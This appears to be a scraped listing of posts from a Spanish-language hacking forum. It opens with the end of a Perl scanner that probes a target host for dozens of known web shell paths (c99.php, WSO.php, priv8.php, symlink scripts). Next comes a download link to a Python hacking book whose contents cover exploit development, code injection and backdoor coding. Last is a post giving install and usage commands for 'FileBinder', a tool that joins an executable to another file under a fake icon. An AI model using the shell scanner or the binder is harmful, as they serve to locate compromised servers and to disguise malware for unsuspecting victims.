"/templates/rhuk_milkyway/wp.rar/",
"/templates/rhuk_milkyway/asp.aspx",
"/templates/rhuk_milkyway/tmp/vaga.php",
"/templates/rhuk_milkyway/tmp/killer.php",
"/templates/rhuk_milkyway/whmcs.php",
"/templates/rhuk_milkyway/abuhlail.php",
"/templates/rhuk_milkyway/tmp/killer.php",
"/templates/rhuk_milkyway/tmp/domaine.pl",
"/templates/rhuk_milkyway/tmp/domaine.php",
"/templates/rhuk_milkyway/useradmin/",
"/templates/rhuk_milkyway/tmp/d0maine.php",
"/templates/rhuk_milkyway/d0maine.php",
"/templates/rhuk_milkyway/tmp/sql.php",
"/templates/rhuk_milkyway/X.php",
"/templates/rhuk_milkyway/123.php",
"/templates/rhuk_milkyway/m.php",
"/templates/rhuk_milkyway/b.php",
"/templates/rhuk_milkyway/up.php",
"/templates/rhuk_milkyway/tmp/dz1.php",
"/templates/rhuk_milkyway/dz1.php",
"/templates/rhuk_milkyway/forum.zip",
"/templates/rhuk_milkyway/Symlink.php",
"/templates/rhuk_milkyway/Symlink.pl",
"/templates/rhuk_milkyway/forum.rar",
"/templates/rhuk_milkyway/joomla.zip",
"/templates/rhuk_milkyway/joomla.rar",
"/templates/rhuk_milkyway/wp.php",
"/templates/rhuk_milkyway/buck.sql",
"/templates/rhuk_milkyway/sysadmin.php",
"/templates/rhuk_milkyway/images/c99.php",
"/templates/rhuk_milkyway/xd.php",
"/templates/rhuk_milkyway/c100.php",
"/templates/rhuk_milkyway/spy.aspx",
"/templates/rhuk_milkyway/xd.php",
"/templates/rhuk_milkyway/tmp/xd.php",
"/templates/rhuk_milkyway/sym/root/home/",
"/templates/rhuk_milkyway/billing/killer.php",
"/templates/rhuk_milkyway/tmp/upload.php",
"/templates/rhuk_milkyway/tmp/admin.php",
"/templates/rhuk_milkyway/Server.php",
"/templates/rhuk_milkyway/tmp/uploads.php",
"/templates/rhuk_milkyway/tmp/up.php",
"/templates/rhuk_milkyway/Server/",
"/templates/rhuk_milkyway/wp-admin/c99.php",
"/templates/rhuk_milkyway/tmp/priv8.php",
"/templates/rhuk_milkyway/priv8.php",
"/templates/rhuk_milkyway/cgi.pl/",
"/templates/rhuk_milkyway/tmp/cgi.pl",
"/templates/rhuk_milkyway/downloads/dom.php",
"/templates/rhuk_milkyway/webadmin.html",
"/templates/rhuk_milkyway/admins.php",
"/templates/rhuk_milkyway/bluff.php",
"/templates/rhuk_milkyway/king.jeen",
"/templates/rhuk_milkyway/admins/",
"/templates/rhuk_milkyway/admins.asp",
"/templates/rhuk_milkyway/admins.php",
"/templates/rhuk_milkyway/wp.zip",
"/templates/rhuk_milkyway/","WSO.php",
"a.php",
"z.php",
"e.php",
"r.php",
"t.php",
"y.php",
"u.php",
"i.php",
"o.php",
"p.php",
"q.php",
"s.php",
"d.php",
"f.php",
"g.php",
"h.php",
"j.php",
"k.php",
"l.php",
"m.php",
"w.php",
"x.php",
"c.php",
"v.php",
"b.php",
"n.php",
"1.php",
"2.php",
"3.php",
"4.php",
"5.php",
"6.php",
"7.php",
"8.php",
"9.php",
"10.php",
"12.php",
"11.php",
"1234.php","hacker.php","hacked.php","sea.php");


foreach $shell @shell) {


$link = $h0st.$shell;
$request = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();


$response = $useragent->request($request);
if($response->is_success){print color("bold green"),"\n\t [SMTH] Something found: $link\n\n";print color 'reset';
}


if($response->content=~ /Access Denied/){
print "\tSomething found: $link [Access Denied]\n\n";
}else{
  print color("bold red"),"[NTHG] Nothing found : $link\n"; print color 'reset';
  }
 


}
#38

Código: text
1
SETTING UP YOUR DEVELOPMENT ENVIRONMENT 1
1.1 Operating System Requirements ......................................................................... 2
1.2 Obtaining and Installing Python 2.5 ................................................................... 2
1.2.1 Installing Python on Windows ............................................................ 2
1.2.2 Installing Python for Linux .................................................................. 3
1.3 Setting Up Eclipse and PyDev ............................................................................ 4
1.3.1 The Hacker's Best Friend: ctypes ........................................................ 5
1.3.2 Using Dynamic Libraries ................................................................... 6
1.3.3 Constructing C Datatypes .................................................................. 8
1.3.4 Passing Parameters by Reference ....................................................... 9
1.3.5 Defining Structures and Unions .......................................................... 9
2
DEBUGGERS AND DEBUGGER DESIGN 13
2.1 General-Purpose CPU Registers......................................................................... 14
2.2 The Stack... 16
2.3 Debug Events ................................................................................................. 18
2.4 Breakpoints ... 18
2.4.1 Soft Breakpoints.............................................................................. 19
2.4.2 Hardware Breakpoints..................................................................... 21
2.4.3 Memory Breakpoints ....................................................................... 23
3
BU ILD ING A W INDOWS DEBUGGER 25
3.1 Debuggee, Where Art Thou?............................................................................ 25
3.2 Obtaining CPU Register State........................................................................... 33
3.2.1 Thread Enumeration ........................................................................ 33
3.2.2 Putting It All Together....................................................................... 35
3.3 Implementing Debug Event Handlers ................................................................. 39
3.4 The Almighty Breakpoint .................................................................................. 43
3.4.1 Soft Breakpoints.............................................................................. 43
3.4.2 Hardware Breakpoints..................................................................... 47
3.4.3 Memory Breakpoints ....................................................................... 52
3.5 Conclusion... 55
x Contents in Detail
4
PYDBG—A PURE PYTHON W INDOWS DEBUGGER 57
4.1 Extending Breakpoint Handlers......................................................................... 58
4.2 Access Violation Handlers................................................................................ 60
4.3 Process Snapshots........................................................................................... 63
4.3.1 Obtaining Process Snapshots ........................................................... 63
4.3.2 Putting It All Together....................................................................... 65
5
IMMUN ITY DEBUGGER—THE BEST O F BOTH WORLDS 69
5.1 Installing Immunity Debugger............................................................................ 70
5.2 Immunity Debugger 101 .................................................................................. 70
5.2.1 PyCommands ................................................................................. 71
5.2.2 PyHooks ........................................................................................ 71
5.3 Exploit Development........................................................................................ 73
5.3.1 Finding Exploit-Friendly Instructions ................................................... 73
5.3.2 Bad-Character Filtering .................................................................... 75
5.3.3 Bypassing DEP on Windows ............................................................ 77
5.4 Defeating Anti-Debugging Routines in Malware .................................................. 81
5.4.1 IsDebuggerPresent .......................................................................... 81
5.4.2 Defeating Process Iteration ............................................................... 82
6
HOOKING 85
6.1 Soft Hooking with PyDbg ................................................................................. 86
6.2 Hard Hooking with Immunity Debugger ............................................................. 90
7
DLL AND CODE INJECT ION 97
7.1 Remote Thread Creation .................................................................................. 98
7.1.1 DLL Injection ................................................................................... 99
7.1.2 Code Injection.............................................................................. 101
7.2 Getting Evil .................................................................................................. 104
7.2.1 File Hiding ................................................................................... 104
7.2.2 Coding the Backdoor .................................................................... 105
7.2.3 Compiling with py2exe.................................................................. 108
8
FUZZING 111
8.1 Bug Classes ................................................................................................. 112
8.1.1 Buffer Overflows ........................................................................... 112
8.1.2 Integer Overflows ......................................................................... 113
8.1.3 Format String Attacks..................................................................... 114
8.2 File Fuzzer ................................................................................................... 115
8.3 Future Considerations.................................................................................... 122
8.3.1 Code Coverage............................................................................ 122
8.3.2 Automated Static Analysis.............................................................. 122
Contents in Detail xi
9
SULLEY 123
9.1 Sulley Installation .......................................................................................... 124
9.2 Sulley Primitives ............................................................................................ 125
9.2.1 Strings ......................................................................................... 125
9.2.2 Delimiters..................................................................................... 125
9.2.3 Static and Random Primitives.......................................................... 126
9.2.4 Binary Data.................................................................................. 126
9.2.5 Integers ....................................................................................... 126
9.2.6 Blocks and Groups........................................................................ 127
9.3 Slaying WarFTPD with Sulley ......................................................................... 129
9.3.1 FTP 101....................................................................................... 129
9.3.2 Creating the FTP Protocol Skeleton .................................................. 130
9.3.3 Sulley Sessions ............................................................................. 131
9.3.4 Network and Process Monitoring .................................................... 132
9.3.5 Fuzzing and the Sulley Web Interface ............................................. 133
10
FUZZING WINDOWS DRIVERS 137
10.1 Driver Communication ................................................................................. 138
10.2 Driver Fuzzing with Immunity Debugger......................................................... 139
10.3 Driverlib—The Static Analysis Tool for Drivers................................................. 142
10.3.1 Discovering Device Names .......................................................... 143
10.3.2 Finding the IOCTL Dispatch Routine............................................... 144
10.3.3 Determining Supported IOCTL Codes ............................................ 145
10.4 Building a Driver Fuzzer .............................................................................. 147
11
IDAPYTHON—SCRIPTING IDA PRO 153
11.1 IDAPython Installation.................................................................................. 154
11.2 IDAPython Functions.................................................................................... 155
11.2.1 Utility Functions........................................................................... 155
11.2.2 Segments ................................................................................... 155
11.2.3 Functions ................................................................................... 156
11.2.4 Cross-References......................................................................... 156
11.2.5 Debugger Hooks......................................................................... 157
11.3 Example Scripts .......................................................................................... 158
11.3.1 Finding Dangerous Function Cross-References................................. 158
11.3.2 Function Code Coverage ............................................................. 160
11.3.3 Calculating Stack Size................................................................. 161
12
PYEMU—THE SCRIPTABLE EMULATOR 163
12.1 Installing PyEmu.......................................................................................... 164
12.2 PyEmu Overview......................................................................................... 164
12.2.1 PyCPU....................................................................................... 164
12.2.2 PyMemory.................................................................................. 165
12.2.3 PyEmu ....................................................................................... 165
xii Contents in Detail
12.2.4 Execution................................................................................... 165
12.2.5 Memory and Register Modifiers .................................................... 165
12.2.6 Handlers.................................................................................... 166
12.3 IDAPyEmu .................................................................................................. 171
12.3.1 Function Emulation ...................................................................... 172
12.3.2 PEPyEmu.................................................................................... 175
12.3.3 Executable Packers...................................................................... 176
12.3.4 UPX Packer ................................................................................ 176
12.3.5 Unpacking UPX with PEPyEmu ...................................................... 177



Enlace de descarga:
Código: text
https://jumpshare.com/v/xFLx3MTm0AISnUawymbO
#39
Python / Vortex - Grabar ISO en USB
Julio 02, 2017, 08:15:14 PM





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#40
Python / FileBinder Src
Julio 02, 2017, 05:22:05 PM
Instalacion:

Código: text
~$ git clone https://github.com/blackvkng/FileBinder.git
~$ cd FileBinder
~# pip install -r requirements.txt


Uso:

Código: text

~$ python2 binder.py file1.exe file2.mp3 newExe.exe icon.ico
 
Example
~$ python2 binder.py test.exe test.txt newExe.exe ico.ico
 
[*] File     : test.exe
[*] File     : test.txt
[*] New File : newExe.exe
 
[+] Exe file ==> C:\Users\user\Desktop\binder\newExe.exe
 





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta